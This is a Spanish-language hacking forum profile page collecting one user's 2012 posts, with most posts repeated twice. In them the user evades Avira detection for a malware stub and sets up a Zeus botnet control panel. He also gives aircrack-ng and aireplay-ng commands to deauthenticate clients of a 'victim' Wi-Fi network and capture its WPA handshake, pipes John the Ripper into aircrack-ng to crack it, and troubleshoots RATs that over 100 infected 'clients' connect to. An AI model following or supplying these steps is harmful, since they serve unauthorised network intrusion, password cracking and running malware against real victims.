ese tip hace que salte una de las firma del avira, TR/Crypt.XPACK.Gen no digo que en todos los stub salte, pero en este que tengo si!
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#1
Desarrollo y modificación de malwares / Re:Tip para Panda y algunas firmas de Bit
Julio 17, 2012, 06:20:03 PM #2
Seguridad Wireless / Re:Papers en español (exploit-db)
Julio 08, 2012, 11:41:33 AM
gracias man y en español!
#3
Dudas y pedidos generales / [SOLUCIONADO] Configurando BotNet Zeus 2.0.8.9
Julio 01, 2012, 07:26:14 PM
Configurando BotNet Zeus 2.0.8.9
Bueno mi pregunta es que estoy instalando Zeus usando como hosting xampp
Ya sé que dirán mira usa este video ya que tiene un hosting gratis i aun mejor que
Xampp pero no es eso lo que busco quiero tener mi hosting yo local no lo quiero en algún hosting gratis online
Lo único que quiero saber porque razón cuando instalo el panel al intentar logearme
No me entra con el pass y el user que coloque
Justo antes de darle a install luego de rellenar los datos requeridos
Aclaro que en las versiones anteriores a las que estoy usando si me va bien me logeo i todo i me auto infecto pero en esta no, estoy en usar esta porque las demás no funcan en win7
Pero en esta versión 2.0.8.9
no me va no sé que estoy configurando mal , he pensado que el pass que pongo para logearme en el panel de Zeus ya esta pre configurado i creo que solo tengo que editar ese archivo que contiene la pass colocarle la que puse al instalarlo i ya con eso estaría solucionado mi problema pero no sé donde se encuentra ese archivo
Otra cosa, me refiero al pass para logearme al panel de Zeus, no al user y el pass del phpMyAdmin que me instala xampp ya que estos si me funcionan correctamente
Explico los pasos que voy haciendo
Instalo el xampp
Voy a la carpeta C:\xampplite\apache\conf edito el httpd.conf coloco mi localhost aclaro lo estoy probando local antes luego lo configuro con mi noip
Luego voy a la carpeta C:\xampplite\htdocs\xampp pego la carpeta server[php]
Luego voy a mi navegador mozilla tipeo localhost
Entro a la primera pantalla del xampp
Cambio el pass de usuario root
Luego procedo a crear la base de datos bssnet
Cargo el archivo bssnet.sql doy en Go
Luego procedo a preparar la instalación del Zeus con los siguientes pasos
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta[php]/install/index.php
Relleno los datos, el user admin le pongo de pas 123456
al user root también le coloque de pass 123456 por ahora luego la fortalezco
coloco el key que esta en el archivo config de la carpeta build donde se encuentra el Zeus
doy a instalar
se instala
entro para loquearme con esto No tienes permitido ver los links. Registrarse o Entrar a mi cuenta[php]/cp.php?=login
aparese el login coloco el user admin i la pass 123456 i no me entraa!!!
QUE ES LO QUE ESTOY HACIENDO MAL!!!
Bueno mi pregunta es que estoy instalando Zeus usando como hosting xampp
Ya sé que dirán mira usa este video ya que tiene un hosting gratis i aun mejor que
Xampp pero no es eso lo que busco quiero tener mi hosting yo local no lo quiero en algún hosting gratis online
Lo único que quiero saber porque razón cuando instalo el panel al intentar logearme
No me entra con el pass y el user que coloque
Justo antes de darle a install luego de rellenar los datos requeridos
Aclaro que en las versiones anteriores a las que estoy usando si me va bien me logeo i todo i me auto infecto pero en esta no, estoy en usar esta porque las demás no funcan en win7
Pero en esta versión 2.0.8.9
no me va no sé que estoy configurando mal , he pensado que el pass que pongo para logearme en el panel de Zeus ya esta pre configurado i creo que solo tengo que editar ese archivo que contiene la pass colocarle la que puse al instalarlo i ya con eso estaría solucionado mi problema pero no sé donde se encuentra ese archivo
Otra cosa, me refiero al pass para logearme al panel de Zeus, no al user y el pass del phpMyAdmin que me instala xampp ya que estos si me funcionan correctamente
Explico los pasos que voy haciendo
Instalo el xampp
Voy a la carpeta C:\xampplite\apache\conf edito el httpd.conf coloco mi localhost aclaro lo estoy probando local antes luego lo configuro con mi noip
Luego voy a la carpeta C:\xampplite\htdocs\xampp pego la carpeta server[php]
Luego voy a mi navegador mozilla tipeo localhost
Entro a la primera pantalla del xampp
Cambio el pass de usuario root
Luego procedo a crear la base de datos bssnet
Cargo el archivo bssnet.sql doy en Go
Luego procedo a preparar la instalación del Zeus con los siguientes pasos
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta[php]/install/index.php
Relleno los datos, el user admin le pongo de pas 123456
al user root también le coloque de pass 123456 por ahora luego la fortalezco
coloco el key que esta en el archivo config de la carpeta build donde se encuentra el Zeus
doy a instalar
se instala
entro para loquearme con esto No tienes permitido ver los links. Registrarse o Entrar a mi cuenta[php]/cp.php?=login
aparese el login coloco el user admin i la pass 123456 i no me entraa!!!
QUE ES LO QUE ESTOY HACIENDO MAL!!!
#4
Dudas y pedidos generales / Re:[DUDA]Instalacion y uso The John Ripper
Junio 26, 2012, 08:05:35 PM
Después del (-w) Como especifico el directorio en el que está el archivo .cap para que el John the ripper comience a comparar la clave wpa o wpa2
#5
Dudas y pedidos generales / Re:[DUDA]Instalacion y uso The John Ripper
Junio 22, 2012, 07:24:20 PM
no tube que instalarlo ya lo tenia instalado el BT5R2
¿Como específico el directorio asi?
esta en la carpeta root de mi BT5R2
john --stdout --incremental:all | aircrack-ng -b 00:CF:D7:0A:D8:09 -w /root/ pass-01.cap
¿Como específico el directorio asi?
esta en la carpeta root de mi BT5R2
john --stdout --incremental:all | aircrack-ng -b 00:CF:D7:0A:D8:09 -w /root/ pass-01.cap
#6
Dudas y pedidos generales / Re:Handshake
Junio 22, 2012, 05:57:53 PM
sudo su
iwconfig
Miras el nombre de tu interfaz el mío es wlan0 tu usas el que te ponga a ti
Haces lo siguiente
ifconfig wlan0 down
iwconfig wlan0 mode monitor
airodump-ng wlan0 esto empezara a ver las redes que hay a tu alcance
Ctrl+c con esto detienes el proceso de escaneo de las redes
Abres otra terminal haces el siguiente paso
airodump-ng -c channel --bssid (MAC VICT) -w password wlan0
Lo dejas capturando i abres otra terminal
I ejecutas lo siguiente
aireplay-ng -0 0 -a (MAC VICT) -c (MAC CLIENT ASOCIAT) wlan0 (esto des autentificara cada cliente asociado siempre que pongas el Mac del cliente asociado en (MAC CLIENT ASOCIAT)
Cuando des autentifiques un cliente asociado con el comando que te puse hay
Por ejemplo -0 0 lo estará des autentificando constante mente
Lo dejas des autentifican doce constante dos o un minuto o tres o lo que tú quieras entonces para que en el airodump se capture el handshake debes pararlo después de 3 o 2 minutos con un Ctrl+c
Presionas la flecha de así riba en tu teclado en la misma terminal i luego Enter para que lo des autentifiques de nuevo
Y te mantienes haciendo eso una i otra vez con cada cliente asociado hasta que captures el handshake
iwconfig
Miras el nombre de tu interfaz el mío es wlan0 tu usas el que te ponga a ti
Haces lo siguiente
ifconfig wlan0 down
iwconfig wlan0 mode monitor
airodump-ng wlan0 esto empezara a ver las redes que hay a tu alcance
Ctrl+c con esto detienes el proceso de escaneo de las redes
Abres otra terminal haces el siguiente paso
airodump-ng -c channel --bssid (MAC VICT) -w password wlan0
Lo dejas capturando i abres otra terminal
I ejecutas lo siguiente
aireplay-ng -0 0 -a (MAC VICT) -c (MAC CLIENT ASOCIAT) wlan0 (esto des autentificara cada cliente asociado siempre que pongas el Mac del cliente asociado en (MAC CLIENT ASOCIAT)
Cuando des autentifiques un cliente asociado con el comando que te puse hay
Por ejemplo -0 0 lo estará des autentificando constante mente
Lo dejas des autentifican doce constante dos o un minuto o tres o lo que tú quieras entonces para que en el airodump se capture el handshake debes pararlo después de 3 o 2 minutos con un Ctrl+c
Presionas la flecha de así riba en tu teclado en la misma terminal i luego Enter para que lo des autentifiques de nuevo
Y te mantienes haciendo eso una i otra vez con cada cliente asociado hasta que captures el handshake
#7
Dudas y pedidos generales / [SOLUCIONADO] Instalacion y uso The John Ripper
Junio 22, 2012, 12:15:45 PM
Mi pregunta es porque me veo obligado a romper claves wpa y wpa2 bien
E capturado un handshake pero como ya sabemos las redes que tienen como seguridad claves wpa y wpa2 contienen pass personales así que, de un diccionario no vale de nada si ese diccionario no tiene la misma palabra que uso de contraseña el dueño de la red wpa o wpa2 del cual hemos capturado el handshake
Entonces mi pregunta es que llegue a la conclusión de que decidí usar el the John ripper ya que es mejor opción que usar un diccionario, que cuando viene a ver ni tiene el pass metido que uso el el dueño de la red con clave wpa o wpa2
Entonces mi pregunta es cómo puedo usar el the John ripper
Lo que quiero hacer es copiar el archivo que contiene el handshake a mi xp ya que esta en BT5R2 en vmware, i desde hay sacar la pass con el the John ripper en mi xp
O si me indican como instalarlo en el backtrack porque la verdad no se cómo aplicarlo lo de la instalación y el uso de esa aplicación
O mejor como aplicarlo desde Windows ya tengo el programa descargado tanto para Windows como para Linux
no encuentro un video o tuto del que me pueda valer para llevar a cabo lo que quiero obtener
E capturado un handshake pero como ya sabemos las redes que tienen como seguridad claves wpa y wpa2 contienen pass personales así que, de un diccionario no vale de nada si ese diccionario no tiene la misma palabra que uso de contraseña el dueño de la red wpa o wpa2 del cual hemos capturado el handshake
Entonces mi pregunta es que llegue a la conclusión de que decidí usar el the John ripper ya que es mejor opción que usar un diccionario, que cuando viene a ver ni tiene el pass metido que uso el el dueño de la red con clave wpa o wpa2
Entonces mi pregunta es cómo puedo usar el the John ripper
Lo que quiero hacer es copiar el archivo que contiene el handshake a mi xp ya que esta en BT5R2 en vmware, i desde hay sacar la pass con el the John ripper en mi xp
O si me indican como instalarlo en el backtrack porque la verdad no se cómo aplicarlo lo de la instalación y el uso de esa aplicación
O mejor como aplicarlo desde Windows ya tengo el programa descargado tanto para Windows como para Linux
no encuentro un video o tuto del que me pueda valer para llevar a cabo lo que quiero obtener
#8
Dudas y pedidos generales / [SOLUCIONADO] Sobrepasado limite de rareza de error de conexión
Mayo 06, 2012, 01:41:43 PM
No sé si les ha pasado esto
Y llevo meses así me pasa lo siguiente
Todos los clientes en mi rat suben perfectamente bien todos i son más de 100 clientes solo aclaro esto para que tengan mejor una mejor idea de mi problema i me ayuden a resorberlo
pero por ejemplo cuándo quiero probar un rat (Porque quiero cambiar de RAT!) porque spynet ya no me complace como QUIERO!
Aquí es que viene el error! NO ME CONECTA! Infectándome yo mismo, ya he probado muchas cosas
Desactivar firewall
Puertos, cambiar de puerto, cambiar de rat, formatie mi ordenador, para ver si tenía algún error mi Windows
Incluso uso xp sp3 i hasta instale Windows 7 y también pasa lo mismo
abrí los puertos tanto manual ,como también en el dmz de los modem
Abrí los puertos en el sistema operativo también, asigne puertos a mi tarjeta de red también
Incluso e actualizado el Windows para ver que le faltara algo i nada TAMPOCO CONECTA!
he formateado i lo primero que e instalado es el cliente no-ip antes que los mismos driver de mi ordenador Luego de que instale no-ip solo abro el rat me infecto i nada TAMPOCO CONECTA!
no uso av no hay ningún av que este prohibiendo la conexión Y TAMPOCO CONECTA
También probé a infectarme desde otro ordenador, lamentable mente esto sobrepasa el límite de rareza de un error de conexión
I no entiendo! mis remotos suben bien todos
Pero conmigo no
LOCAL MENTE SI CONECTA usando la ip local que es 127.0.0.1 una cosa que saben todos llevo años usando rat pero algo como esto no lo había visto nunca
También e probado a configurar los server de los rat de muchas formas distintas
Los rat que he usado son: spynet, bifros, poison, xtreme rat, darkcomet rat
Y llevo meses así me pasa lo siguiente
Todos los clientes en mi rat suben perfectamente bien todos i son más de 100 clientes solo aclaro esto para que tengan mejor una mejor idea de mi problema i me ayuden a resorberlo
pero por ejemplo cuándo quiero probar un rat (Porque quiero cambiar de RAT!) porque spynet ya no me complace como QUIERO!
Aquí es que viene el error! NO ME CONECTA! Infectándome yo mismo, ya he probado muchas cosas
Desactivar firewall
Puertos, cambiar de puerto, cambiar de rat, formatie mi ordenador, para ver si tenía algún error mi Windows
Incluso uso xp sp3 i hasta instale Windows 7 y también pasa lo mismo
abrí los puertos tanto manual ,como también en el dmz de los modem
Abrí los puertos en el sistema operativo también, asigne puertos a mi tarjeta de red también
Incluso e actualizado el Windows para ver que le faltara algo i nada TAMPOCO CONECTA!
he formateado i lo primero que e instalado es el cliente no-ip antes que los mismos driver de mi ordenador Luego de que instale no-ip solo abro el rat me infecto i nada TAMPOCO CONECTA!
no uso av no hay ningún av que este prohibiendo la conexión Y TAMPOCO CONECTA
También probé a infectarme desde otro ordenador, lamentable mente esto sobrepasa el límite de rareza de un error de conexión
I no entiendo! mis remotos suben bien todos
Pero conmigo no
LOCAL MENTE SI CONECTA usando la ip local que es 127.0.0.1 una cosa que saben todos llevo años usando rat pero algo como esto no lo había visto nunca
También e probado a configurar los server de los rat de muchas formas distintas
Los rat que he usado son: spynet, bifros, poison, xtreme rat, darkcomet rat
Páginas1